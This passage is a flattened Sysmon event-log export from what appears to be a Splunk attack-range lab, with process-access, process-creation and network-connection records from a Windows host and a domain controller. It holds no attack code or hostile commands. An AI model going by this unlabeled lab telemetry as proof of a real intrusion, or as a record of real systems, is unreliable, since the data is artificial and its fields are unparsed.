Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219016Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:50.316{4F8D34B0-1496-6216-B904-000000003902}3844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000219015Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:50.144{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B95397A84C3521194C128311F7F9D01,SHA256=C06280E8D6291B4D88C2D95937701FD35063F1F18BD0F4EDC0475BFBA6BA8152,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219014Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:46.686{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51494-false10.0.1.12-8000- 10341000x8000000000000000294796Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:51.702{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294795Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:51.702{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294794Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:51.702{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000294793Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:49.672{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49174-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294792Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:51.455{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDAD44E939F00916749E89795F738CCC,SHA256=BE2AF22E59CEFB26ADACD867137198D33152EF7F45C01DF9733EEC623A33B9B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219045Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:49.507{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx50257-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 10341000x8000000000000000219044Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:51.190{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1497-6216-BA04-000000003902}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219043Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:51.190{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219042Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:51.190{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219041Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:51.190{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219040Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:51.190{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219039Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:51.190{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219038Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:51.190{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219037Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:51.190{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219036Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:51.190{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219035Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:51.190{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219034Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:51.190{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1497-6216-BA04-000000003902}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219033Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:51.190{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1497-6216-BA04-000000003902}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219032Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:51.191{4F8D34B0-1497-6216-BA04-000000003902}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000219031Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:51.175{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0988A3BC577A48E8E7C7DD2613ACE52,SHA256=C80E717CC44D351E4175E6D720C172F29C572575F2C975CCAC3C1AF78DEEC640,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294806Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:52.702{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294805Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:52.702{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000294804Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:50.347{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:c830:d833:fbf:ffff-53902-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x8000000000000000294803Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:50.347{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53902-trueff02:0:0:0:0:0:1:3-5355llmnr 10341000x8000000000000000294802Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:52.540{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294801Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:52.539{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294800Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:52.538{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\n